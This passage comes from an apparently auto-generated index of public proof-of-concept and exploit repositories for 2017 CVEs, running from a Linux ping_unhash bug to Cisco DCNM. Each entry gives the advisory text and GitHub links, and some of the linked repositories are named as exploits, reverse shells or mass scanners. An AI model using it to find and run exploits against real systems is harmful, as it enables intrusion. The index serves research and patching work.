The ping_unhash function in net/ipv4/ping.c in the Linux kernel through 4.10.8 is too late in obtaining a certain lock and consequently cannot ensure that disconnect function calls are safe, which allows local users to cause a denial of service (panic) by leveraging access to the protocol value of IPPROTO_ICMP in a socket system call.

- [homjxi0e/CVE-2017-2671](https://github.com/homjxi0e/CVE-2017-2671)

### CVE-2017-2741 (2018-01-23)

A potential security vulnerability has been identified with HP PageWide Printers, HP OfficeJet Pro Printers, with firmware before 1708D. This vulnerability could potentially be exploited to execute arbitrary code.

- [dopheide-esnet/zeek-jetdirect](https://github.com/dopheide-esnet/zeek-jetdirect)

### CVE-2017-2751 (2018-10-03)

A BIOS password extraction vulnerability has been reported on certain consumer notebooks with firmware F.22 and others. The BIOS password was stored in CMOS in a way that allowed it to be extracted. This applies to consumer notebooks launched in early 2014.

- [BaderSZ/CVE-2017-2751](https://github.com/BaderSZ/CVE-2017-2751)

### CVE-2017-2793 (2017-05-23)

An exploitable heap corruption vulnerability exists in the UnCompressUnicode functionality of Antenna House DMC HTMLFilter used by MarkLogic 8.0-6. A specially crafted xls file can cause a heap corruption resulting in arbitrary code execution. An attacker can send/provide a malicious XLS file to trigger this vulnerability.

- [sUbc0ol/Detection-for-CVE-2017-2793](https://github.com/sUbc0ol/Detection-for-CVE-2017-2793)

### CVE-2017-2824 (2017-05-24)

An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X. A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.

- [listenquiet/cve-2017-2824-reverse-shell](https://github.com/listenquiet/cve-2017-2824-reverse-shell)

### CVE-2017-2903 (2018-04-24)

An exploitable integer overflow exists in the DPX loading functionality of the Blender open-source 3D creation suite version 2.78c. A specially crafted '.cin' file can cause an integer overflow resulting in a buffer overflow which can allow for code execution under the context of the application. An attacker can convince a user to use the file as an asset via the sequencer in order to trigger this vulnerability.

- [SpiralBL0CK/dpx_work_CVE-2017-2903](https://github.com/SpiralBL0CK/dpx_work_CVE-2017-2903)

### CVE-2017-3000 (2017-03-14)

Adobe Flash Player versions 24.0.0.221 and earlier have a vulnerability in the random number generator used for constant blinding. Successful exploitation could lead to information disclosure.

- [dangokyo/CVE-2017-3000](https://github.com/dangokyo/CVE-2017-3000)

### CVE-2017-3066 (2017-04-27)

Adobe ColdFusion 2016 Update 3 and earlier, ColdFusion 11 update 11 and earlier, ColdFusion 10 Update 22 and earlier have a Java deserialization vulnerability in the Apache BlazeDS library. Successful exploitation could lead to arbitrary code execution.

- [codewhitesec/ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn)
- [cucadili/CVE-2017-3066](https://github.com/cucadili/CVE-2017-3066)

### CVE-2017-3078 (2017-06-20)

Adobe Flash Player versions 25.0.0.171 and earlier have an exploitable memory corruption vulnerability in the Adobe Texture Format (ATF) module. Successful exploitation could lead to arbitrary code execution.

- [homjxi0e/CVE-2017-3078](https://github.com/homjxi0e/CVE-2017-3078)

### CVE-2017-3143 (2019-01-16)

An attacker who is able to send and receive messages to an authoritative DNS server and who has knowledge of a valid TSIG key name for the zone and service being targeted may be able to manipulate BIND into accepting an unauthorized dynamic update. Affects BIND 9.4.0->9.8.8, 9.9.0->9.9.10-P1, 9.10.0->9.10.5-P1, 9.11.0->9.11.1-P1, 9.9.3-S1->9.9.10-S2, 9.10.5-S1->9.10.5-S2.

- [saaph/CVE-2017-3143](https://github.com/saaph/CVE-2017-3143)

### CVE-2017-3164 (2019-03-08)

Server Side Request Forgery in Apache Solr, versions 1.3 until 7.6 (inclusive). Since the "shards" parameter does not have a corresponding whitelist mechanism, a remote attacker with access to the server could make Solr perform an HTTP GET request to any reachable URL.

- [tdwyer/PoC_CVE-2017-3164_CVE-2017-1262](https://github.com/tdwyer/PoC_CVE-2017-3164_CVE-2017-1262)

### CVE-2017-3241 (2017-01-27)

Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u131, 7u121 and 8u112; Java SE Embedded: 8u111; JRockit: R28.3.12. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. While the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS v3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts).

- [xfei3/CVE-2017-3241-POC](https://github.com/xfei3/CVE-2017-3241-POC)
- [scopion/CVE-2017-3241](https://github.com/scopion/CVE-2017-3241)

### CVE-2017-3248 (2017-01-27)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0 and 12.2.1.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS v3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts).

- [ianxtianxt/CVE-2017-3248](https://github.com/ianxtianxt/CVE-2017-3248)
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [BabyTeam1024/CVE-2017-3248](https://github.com/BabyTeam1024/CVE-2017-3248)

### CVE-2017-3506 (2017-04-24)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).

- [ianxtianxt/CVE-2017-3506](https://github.com/ianxtianxt/CVE-2017-3506)
- [Al1ex/CVE-2017-3506](https://github.com/Al1ex/CVE-2017-3506)

### CVE-2017-3599 (2017-04-24)

Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily "exploitable" vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). NOTE: the previous information is from the April 2017 CPU. Oracle has not commented on third-party claims that this issue is an integer overflow in sql/auth/sql_authentication.cc which allows remote attackers to cause a denial of service via a crafted authentication packet.

- [SECFORCE/CVE-2017-3599](https://github.com/SECFORCE/CVE-2017-3599)
- [jptr218/mysql_dos](https://github.com/jptr218/mysql_dos)

### CVE-2017-3730 (2017-05-04)

In OpenSSL 1.1.0 before 1.1.0d, if a malicious server supplies bad parameters for a DHE or ECDHE key exchange then this can result in the client attempting to dereference a NULL pointer leading to a client crash. This could be exploited in a Denial of Service attack.

- [guidovranken/CVE-2017-3730](https://github.com/guidovranken/CVE-2017-3730)

### CVE-2017-3881 (2017-03-17)

A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.

- [artkond/cisco-rce](https://github.com/artkond/cisco-rce)
- [homjxi0e/CVE-2017-3881-exploit-cisco-](https://github.com/homjxi0e/CVE-2017-3881-exploit-cisco-)
- [homjxi0e/CVE-2017-3881-Cisco](https://github.com/homjxi0e/CVE-2017-3881-Cisco)
- [mzakyz666/PoC-CVE-2017-3881](https://github.com/mzakyz666/PoC-CVE-2017-3881)
- [1337g/CVE-2017-3881](https://github.com/1337g/CVE-2017-3881)

### CVE-2017-4490
- [homjxi0e/CVE-2017-4490-](https://github.com/homjxi0e/CVE-2017-4490-)
- [homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-](https://github.com/homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-)

### CVE-2017-4878
- [brianwrf/CVE-2017-4878-Samples](https://github.com/brianwrf/CVE-2017-4878-Samples)

### CVE-2017-4971 (2017-06-13)

An issue was discovered in Pivotal Spring Web Flow through 2.4.4. Applications that do not change the value of the MvcViewFactoryCreator useSpringBinding property which is disabled by default (i.e., set to 'false') can be vulnerable to malicious EL expressions in view states that process form submissions but do not have a sub-element to declare explicit data binding property mappings.

- [cved-sources/cve-2017-4971](https://github.com/cved-sources/cve-2017-4971)

### CVE-2017-5005 (2017-01-02)

Stack-based buffer overflow in Quick Heal Internet Security 10.1.0.316 and earlier, Total Security 10.1.0.316 and earlier, and AntiVirus Pro 10.1.0.316 and earlier on OS X allows remote attackers to execute arbitrary code via a crafted LC_UNIXTHREAD.cmdsize field in a Mach-O file that is mishandled during a Security Scan (aka Custom Scan) operation.

- [payatu/QuickHeal](https://github.com/payatu/QuickHeal)

### CVE-2017-5007 (2017-02-17)

Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled the sequence of events when closing a page, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.

- [Ang-YC/CVE-2017-5007](https://github.com/Ang-YC/CVE-2017-5007)

### CVE-2017-5123 (2021-11-02)

Insufficient data validation in waitid allowed a user to escape sandboxes on Linux.

- [FloatingGuy/CVE-2017-5123](https://github.com/FloatingGuy/CVE-2017-5123)
- [0x5068656e6f6c/CVE-2017-5123](https://github.com/0x5068656e6f6c/CVE-2017-5123)
- [Synacktiv-contrib/exploiting-cve-2017-5123](https://github.com/Synacktiv-contrib/exploiting-cve-2017-5123)
- [teawater/CVE-2017-5123](https://github.com/teawater/CVE-2017-5123)
- [c3r34lk1ll3r/CVE-2017-5123](https://github.com/c3r34lk1ll3r/CVE-2017-5123)
- [h1bAna/CVE-2017-5123](https://github.com/h1bAna/CVE-2017-5123)

### CVE-2017-5124 (2018-02-07)

Incorrect application of sandboxing in Blink in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted MHTML page.

- [Bo0oM/CVE-2017-5124](https://github.com/Bo0oM/CVE-2017-5124)

### CVE-2017-5223 (2017-01-16)

An issue was discovered in PHPMailer before 5.2.22. PHPMailer's msgHTML method applies transformations to an HTML document to make it usable as an email message body. One of the transformations is to convert relative image URLs into attachments using a script-provided base directory. If no base directory is provided, it resolves to /, meaning that relative image URLs get treated as absolute local file paths and added as attachments. To form a remote vulnerability, the msgHTML method must be called, passed an unfiltered, user-supplied HTML document, and must not set a base directory.

- [cscli/CVE-2017-5223](https://github.com/cscli/CVE-2017-5223)

### CVE-2017-5415 (2018-06-11)

An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by "blob:" as the protocol, leading to user confusion and further spoofing attacks. This vulnerability affects Firefox < 52.

- [649/CVE-2017-5415](https://github.com/649/CVE-2017-5415)

### CVE-2017-5487 (2017-01-15)

wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.

- [teambugsbunny/wpUsersScan](https://github.com/teambugsbunny/wpUsersScan)
- [R3K1NG/wpUsersScan](https://github.com/R3K1NG/wpUsersScan)
- [GeunSam2/CVE-2017-5487](https://github.com/GeunSam2/CVE-2017-5487)
- [patilkr/wp-CVE-2017-5487-exploit](https://github.com/patilkr/wp-CVE-2017-5487-exploit)
- [zkhalidul/GrabberWP-CVE-2017-5487](https://github.com/zkhalidul/GrabberWP-CVE-2017-5487)
- [SeasonLeague/CVE-2017-5487](https://github.com/SeasonLeague/CVE-2017-5487)
- [Ravindu-Priyankara/CVE-2017-5487-vulnerability-on-NSBM](https://github.com/Ravindu-Priyankara/CVE-2017-5487-vulnerability-on-NSBM)
- [K3ysTr0K3R/CVE-2017-5487-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-5487-EXPLOIT)
- [dream434/CVE-2017-5487](https://github.com/dream434/CVE-2017-5487)

### CVE-2017-5633 (2017-03-06)

Multiple cross-site request forgery (CSRF) vulnerabilities on the D-Link DI-524 Wireless Router with firmware 9.01 allow remote attackers to (1) change the admin password, (2) reboot the device, or (3) possibly have unspecified other impact via crafted requests to CGI programs.

- [cardangi/Exploit-CVE-2017-5633](https://github.com/cardangi/Exploit-CVE-2017-5633)

### CVE-2017-5638 (2017-03-11)

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

- [PolarisLab/S2-045](https://github.com/PolarisLab/S2-045)
- [Flyteas/Struts2-045-Exp](https://github.com/Flyteas/Struts2-045-Exp)
- [bongbongco/cve-2017-5638](https://github.com/bongbongco/cve-2017-5638)
- [jas502n/S2-045-EXP-POC-TOOLS](https://github.com/jas502n/S2-045-EXP-POC-TOOLS)
- [mthbernardes/strutszeiro](https://github.com/mthbernardes/strutszeiro)
- [xsscx/cve-2017-5638](https://github.com/xsscx/cve-2017-5638)
- [immunio/apache-struts2-CVE-2017-5638](https://github.com/immunio/apache-struts2-CVE-2017-5638)
- [Masahiro-Yamada/OgnlContentTypeRejectorValve](https://github.com/Masahiro-Yamada/OgnlContentTypeRejectorValve)
- [aljazceru/CVE-2017-5638-Apache-Struts2](https://github.com/aljazceru/CVE-2017-5638-Apache-Struts2)
- [sjitech/test_struts2_vulnerability_CVE-2017-5638](https://github.com/sjitech/test_struts2_vulnerability_CVE-2017-5638)
- [jrrombaldo/CVE-2017-5638](https://github.com/jrrombaldo/CVE-2017-5638)
- [random-robbie/CVE-2017-5638](https://github.com/random-robbie/CVE-2017-5638)
- [initconf/CVE-2017-5638_struts](https://github.com/initconf/CVE-2017-5638_struts)
- [mazen160/struts-pwn](https://github.com/mazen160/struts-pwn)
- [ret2jazzy/Struts-Apache-ExploitPack](https://github.com/ret2jazzy/Struts-Apache-ExploitPack)
- [lolwaleet/ExpStruts](https://github.com/lolwaleet/ExpStruts)
- [oktavianto/CVE-2017-5638-Apache-Struts2](https://github.com/oktavianto/CVE-2017-5638-Apache-Struts2)
- [jrrdev/cve-2017-5638](https://github.com/jrrdev/cve-2017-5638)
- [opt9/Strutshock](https://github.com/opt9/Strutshock)
- [falcon-lnhg/StrutsShell](https://github.com/falcon-lnhg/StrutsShell)
- [bhagdave/CVE-2017-5638](https://github.com/bhagdave/CVE-2017-5638)
- [KarzsGHR/S2-046_S2-045_POC](https://github.com/KarzsGHR/S2-046_S2-045_POC)
- [gsfish/S2-Reaper](https://github.com/gsfish/S2-Reaper)
- [mcassano/cve-2017-5638](https://github.com/mcassano/cve-2017-5638)
- [opt9/Strutscli](https://github.com/opt9/Strutscli)
- [tahmed11/strutsy](https://github.com/tahmed11/strutsy)
- [payatu/CVE-2017-5638](https://github.com/payatu/CVE-2017-5638)
- [Aasron/Struts2-045-Exp](https://github.com/Aasron/Struts2-045-Exp)
- [SpiderMate/Stutsfi](https://github.com/SpiderMate/Stutsfi)
- [jpacora/Struts2Shell](https://github.com/jpacora/Struts2Shell)
- [AndreasKl/CVE-2017-5638](https://github.com/AndreasKl/CVE-2017-5638)
- [riyazwalikar/struts-rce-cve-2017-5638](https://github.com/riyazwalikar/struts-rce-cve-2017-5638)
- [homjxi0e/CVE-2017-5638](https://github.com/homjxi0e/CVE-2017-5638)
- [eeehit/CVE-2017-5638](https://github.com/eeehit/CVE-2017-5638)
- [sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://github.com/sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner)
- [sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638](https://github.com/sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638)
- [R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-](https://github.com/R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-)
- [Xhendos/CVE-2017-5638](https://github.com/Xhendos/CVE-2017-5638)
- [TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://github.com/TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner)
- [invisiblethreat/strutser](https://github.com/invisiblethreat/strutser)
- [lizhi16/CVE-2017-5638](https://github.com/lizhi16/CVE-2017-5638)
- [c002/Apache-Struts](https://github.com/c002/Apache-Struts)
- [donaldashdown/Common-Vulnerability-and-Exploit](https://github.com/donaldashdown/Common-Vulnerability-and-Exploit)
- [sighup1/cybersecurity-struts2](https://github.com/sighup1/cybersecurity-struts2)
- [cafnet/apache-struts-v2-CVE-2017-5638](https://github.com/cafnet/apache-struts-v2-CVE-2017-5638)
- [0x00-0x00/CVE-2017-5638](https://github.com/0x00-0x00/CVE-2017-5638)
- [m3ssap0/struts2_cve-2017-5638](https://github.com/m3ssap0/struts2_cve-2017-5638)
- [Greynad/struts2-jakarta-inject](https://github.com/Greynad/struts2-jakarta-inject)
- [ggolawski/struts-rce](https://github.com/ggolawski/struts-rce)
- [win3zz/CVE-2017-5638](https://github.com/win3zz/CVE-2017-5638)
- [leandrocamposcardoso/CVE-2017-5638-Mass-Exploit](https://github.com/leandrocamposcardoso/CVE-2017-5638-Mass-Exploit)
- [Iletee/struts2-rce](https://github.com/Iletee/struts2-rce)
- [andypitcher/check_struts](https://github.com/andypitcher/check_struts)
- [un4ckn0wl3z/CVE-2017-5638](https://github.com/un4ckn0wl3z/CVE-2017-5638)
- [colorblindpentester/CVE-2017-5638](https://github.com/colorblindpentester/CVE-2017-5638)
- [injcristianrojas/cve-2017-5638](https://github.com/injcristianrojas/cve-2017-5638)
- [ludy-dev/XworkStruts-RCE](https://github.com/ludy-dev/XworkStruts-RCE)
- [sonatype-workshops/struts2-rce](https://github.com/sonatype-workshops/struts2-rce)
- [jongmartinez/CVE-2017-5638](https://github.com/jongmartinez/CVE-2017-5638)
- [Badbird3/CVE-2017-5638](https://github.com/Badbird3/CVE-2017-5638)
- [jptr218/struts_hack](https://github.com/jptr218/struts_hack)
- [testpilot031/vulnerability_struts-2.3.31](https://github.com/testpilot031/vulnerability_struts-2.3.31)
- [readloud/CVE-2017-5638](https://github.com/readloud/CVE-2017-5638)
- [Tankirat/CVE-2017-5638](https://github.com/Tankirat/CVE-2017-5638)
- [0xConstant/CVE-2017-5638](https://github.com/0xConstant/CVE-2017-5638)
- [mfdev-solution/Exploit-CVE-2017-5638](https://github.com/mfdev-solution/Exploit-CVE-2017-5638)
- [mritunjay-k/CVE-2017-5638](https://github.com/mritunjay-k/CVE-2017-5638)
- [FredBrave/CVE-2017-5638-ApacheStruts2.3.5](https://github.com/FredBrave/CVE-2017-5638-ApacheStruts2.3.5)
- [Nithylesh/web-application-firewall-](https://github.com/Nithylesh/web-application-firewall-)
- [kloutkake/CVE-2017-5638-PoC](https://github.com/kloutkake/CVE-2017-5638-PoC)

### CVE-2017-5645 (2017-04-17)

In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.

- [pimps/CVE-2017-5645](https://github.com/pimps/CVE-2017-5645)
- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)

### CVE-2017-5689 (2017-05-02)

An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).

- [CerberusSecurity/CVE-2017-5689](https://github.com/CerberusSecurity/CVE-2017-5689)
- [haxrob/amthoneypot](https://github.com/haxrob/amthoneypot)
- [Bijaye/intel_amt_bypass](https://github.com/Bijaye/intel_amt_bypass)
- [embedi/amt_auth_bypass_poc](https://github.com/embedi/amt_auth_bypass_poc)
- [TheWay-hue/CVE-2017-5689-Checker](https://github.com/TheWay-hue/CVE-2017-5689-Checker)

### CVE-2017-5693 (2018-07-31)

Firmware in the Intel Puma 5, 6, and 7 Series might experience resource depletion or timeout, which allows a network attacker to create a denial of service via crafted network traffic.

- [LunNova/Puma6Fail](https://github.com/LunNova/Puma6Fail)

### CVE-2017-5715 (2018-01-04)

Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.

- [opsxcq/exploit-cve-2017-5715](https://github.com/opsxcq/exploit-cve-2017-5715)
- [mathse/meltdown-spectre-bios-list](https://github.com/mathse/meltdown-spectre-bios-list)
- [GregAskew/SpeculativeExecutionAssessment](https://github.com/GregAskew/SpeculativeExecutionAssessment)
- [dmo2118/retpoline-audit](https://github.com/dmo2118/retpoline-audit)
- [GalloLuigi/Analisi-CVE-2017-5715](https://github.com/GalloLuigi/Analisi-CVE-2017-5715)

### CVE-2017-5721 (2017-10-11)

Insufficient input validation in system firmware for Intel NUC7i3BNK, NUC7i3BNH, NUC7i5BNK, NUC7i5BNH, NUC7i7BNH versions BN0049 and below allows local attackers to execute arbitrary code via manipulation of memory.

- [embedi/smm_usbrt_poc](https://github.com/embedi/smm_usbrt_poc)

### CVE-2017-5753 (2018-01-04)

Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.

- [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack)
- [EdwardOwusuAdjei/Spectre-PoC](https://github.com/EdwardOwusuAdjei/Spectre-PoC)
- [00052/spectre-attack-example](https://github.com/00052/spectre-attack-example)
- [pedrolucasoliva/spectre-attack-demo](https://github.com/pedrolucasoliva/spectre-attack-demo)
- [ixtal23/spectreScope](https://github.com/ixtal23/spectreScope)
- [albertleecn/cve-2017-5753](https://github.com/albertleecn/cve-2017-5753)
- [sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-](https://github.com/sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-)

### CVE-2017-5754 (2018-01-04)

Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.

- [ionescu007/SpecuCheck](https://github.com/ionescu007/SpecuCheck)
- [raphaelsc/Am-I-affected-by-Meltdown](https://github.com/raphaelsc/Am-I-affected-by-Meltdown)
- [Viralmaniar/In-Spectre-Meltdown](https://github.com/Viralmaniar/In-Spectre-Meltdown)
- [speecyy/Am-I-affected-by-Meltdown](https://github.com/speecyy/Am-I-affected-by-Meltdown)
- [zzado/Meltdown](https://github.com/zzado/Meltdown)
- [jdmulloy/meltdown-aws-scanner](https://github.com/jdmulloy/meltdown-aws-scanner)

### CVE-2017-5792 (2018-02-15)

A Remote Code Execution vulnerability in HPE Intelligent Management Center (iMC) PLAT version 7.3 E0504P2 was found.

- [scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization](https://github.com/scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization)

### CVE-2017-5941 (2017-02-09)

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).

- [Frivolous-scholar/CVE-2017-5941-NodeJS-RCE](https://github.com/Frivolous-scholar/CVE-2017-5941-NodeJS-RCE)
- [turnernator1/Node.js-CVE-2017-5941](https://github.com/turnernator1/Node.js-CVE-2017-5941)
- [Cr4zyD14m0nd137/Lab-for-cve-2018-15133](https://github.com/Cr4zyD14m0nd137/Lab-for-cve-2018-15133)
- [uartu0/nodejshell](https://github.com/uartu0/nodejshell)

### CVE-2017-6008 (2017-09-13)

A kernel pool overflow in the driver hitmanpro37.sys in Sophos SurfRight HitmanPro before 3.7.20 Build 286 (included in the HitmanPro.Alert solution and Sophos Clean) allows local users to escalate privileges via a malformed IOCTL call.

- [cbayet/Exploit-CVE-2017-6008](https://github.com/cbayet/Exploit-CVE-2017-6008)

### CVE-2017-6074 (2017-02-18)

The dccp_rcv_state_process function in net/dccp/input.c in the Linux kernel through 4.9.11 mishandles DCCP_PKT_REQUEST packet data structures in the LISTEN state, which allows local users to obtain root privileges or cause a denial of service (double free) via an application that makes an IPV6_RECVPKTINFO setsockopt system call.

- [BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074](https://github.com/BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074)
- [toanthang1842002/CVE-2017-6074](https://github.com/toanthang1842002/CVE-2017-6074)

### CVE-2017-6079 (2017-05-16)

The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows user-defined commands, such as specific iptables routes, to be set. This page can essentially be used as a web shell to execute commands, though the web application gives no feedback client-side: if the command is valid, it executes. An example is the wget command. The page that allows this has been confirmed in firmware as old as 2006.

- [MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit](https://github.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit)

### CVE-2017-6090 (2017-10-02)

Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/.

- [jlk/exploit-CVE-2017-6090](https://github.com/jlk/exploit-CVE-2017-6090)

### CVE-2017-6206 (2017-02-23)

D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28, and DGS-1510-20 Websmart devices with firmware before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure attacks via unspecified vectors.

- [varangamin/CVE-2017-6206](https://github.com/varangamin/CVE-2017-6206)

### CVE-2017-6370 (2017-03-17)

TYPO3 7.6.15 sends an http request to an index.php?loginProvider URI in cases with an https Referer, which allows remote attackers to obtain sensitive cleartext information by sniffing the network and reading the userident and username fields.

- [faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request](https://github.com/faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request)

### CVE-2017-6516 (2017-03-14)

A Local Privilege Escalation Vulnerability in MagniComp's Sysinfo before 10-H64 for Linux and UNIX platforms could allow a local attacker to gain elevated privileges. Parts of SysInfo require setuid-to-root access in order to access restricted system files and make restricted kernel calls. This access could be exploited by a local attacker to gain a root shell prompt using the right combination of environment variables and command line arguments.

- [Rubytox/CVE-2017-6516-mcsiwrapper-](https://github.com/Rubytox/CVE-2017-6516-mcsiwrapper-)

### CVE-2017-6558 (2017-03-09)

iball Baton 150M iB-WRA150N v1 00000001 1.2.6 build 110401 Rel.47776n devices are prone to an authentication bypass vulnerability that allows remote attackers to view and modify administrative router settings by reading the HTML source code of the password.cgi file.

- [GemGeorge/iBall-UTStar-CVEChecker](https://github.com/GemGeorge/iBall-UTStar-CVEChecker)

### CVE-2017-6640 (2017-06-08)

A vulnerability in Cisco Prime Data Center Network Manager (DCNM) Software could allow an unauthenticated, remote attacker to log in to the administrative console of a DCNM server by using an account that has a default, static password. The account could be granted root- or system-level privileges. The vulnerability exists because the affected software has a default user account that has a default, static password. The user account is created automatically when the software is installed. An attacker could exploit this vulnerability by connecting remotely to an affected system and logging in to the affected software by using the credentials for this default user account. A successful exploit could allow the attacker to use this default user account to log in to the affected software and gain access to the administrative console of a DCNM server. This vulnerability affects Cisco Prime Data Center Network Manager (DCNM) Software releases prior to Release 10.2(1) for Microsoft Windows, Linux, and Virtual Appliance platforms. Cisco Bug IDs: CSCvd95346.

- [hemp3l/CVE-2017-6640-POC](https://github.com/hemp3l/CVE-2017-6640-POC)

### CVE-2017-6736 (2017-07-17)

